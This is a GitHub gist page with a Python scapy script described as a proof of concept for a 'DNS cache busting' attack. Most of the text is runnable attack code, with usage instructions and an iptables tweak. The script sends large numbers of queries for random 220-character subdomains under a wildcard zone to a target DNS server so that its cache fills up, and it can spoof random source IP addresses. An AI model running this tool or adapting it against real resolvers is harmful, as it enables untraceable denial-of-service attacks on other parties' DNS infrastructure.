Last active
August 29, 2015 14:12
-
-
Save sipherr/1b4246bc7f1fc087665e to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# DNS wildcard attack POC (cache busting?) | |
# | |
# DNS Server pwnage from a single host. This tool will clobber a DNS cache server. | |
# | |
# Theory | |
# Force a cache server to cache records for a DNS zone that will answer for non-existant domain names.. http://en.wikipedia.org/wiki/Wildcard_DNS_record | |
# | |
# Example: *.godaddy.com | |
# | |
# Running on Ubuntu | |
# apt-get install python-scapy | |
# | |
# Make sure to drop ICMP Unreachable if not spoofing. Since we are not using the system connect() functions the kernel will ICMP unreach to victim (which may or may not impact the results of the attack). | |
# | |
# iptables -I OUTPUT -p icmp --icmp-type destination-unreachable -j DROP | |
# | |
# As root | |
# Example usage: python dnsb.py ns1.target.com 3.1.33.7 godaddy.com 10000 0 | |
# | |
# BIND 9 default max cache ttl is 7 days. | |
# max-cache-ttl sets the maximum time (in seconds) for which the server will cache positive answers (negative answers NXDOMAIN is defined by max-ncache-ttl). The default is one week (7 days). This statement may be used in view or a global options clause. | |
from scapy.all import * | |
import random | |
import string | |
import sys | |
# inet_ntoa | |
import socket | |
import struct | |
# Maximum subdomain lenght..consumes more memory in the cache. | |
# This subdivision can go down to 127 levels deep, and each DNS label can contain up to 63 characters, as long as the whole domain name does not exceed a total length of 255 characters. | |
def randomain(size=220, chars=string.letters + string.digits): | |
return ''.join(random.choice(chars) for _ in range(size)) | |
if(os.getuid())!=0: | |
print "ERROR: Must be root to use raw sockets." | |
sys.exit(1) | |
if (len(sys.argv) != 6): | |
print "DNS Cache Busting attack Proof of concept" | |
print "Usage: " + sys.argv[0] + " < target > < source > < wild card domain > < number of packets > < spoof 0 = off / 1 = on >" | |
quit() | |
target=sys.argv[1] | |
source=sys.argv[2] | |
dlist=sys.argv[3] | |
num=int(sys.argv[4]) | |
spoof=int(sys.argv[5]) | |
# get local IP excluding loopback. A bit misleading, google's cache plays no part in the attack. | |
myip=([(s.connect(('8.8.8.8', 80)), s.getsockname()[0], s.close()) for s in [socket.socket(socket.AF_INET, socket.SOCK_DGRAM)]][0][1]) | |
print "Sending packets to: "+target | |
for x in range(0, num): | |
# If we want to spoof? | |
if spoof == 1: | |
randsource=socket.inet_ntoa(struct.pack('>I', random.randint(1, 0xffffffff))) | |
myip=randsource | |
print myip | |
# generate random sub domain | |
rdom=randomain() | |
rd= rdom + '.' + dlist | |
# send out packets :) | |
req = IP(dst=target,src=myip)/UDP(sport=random.randint(1025, 65000), dport=53)/DNS(id=random.randint(1025, 65000), opcode=0, qr=0, rd=1, ra=0, qdcount=1, ancount=0, nscount=0, arcount=0,qd=DNSQR(qname=rd, qtype=1, qclass=1),an=0,ns=0,ar=0) | |
send(req) | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment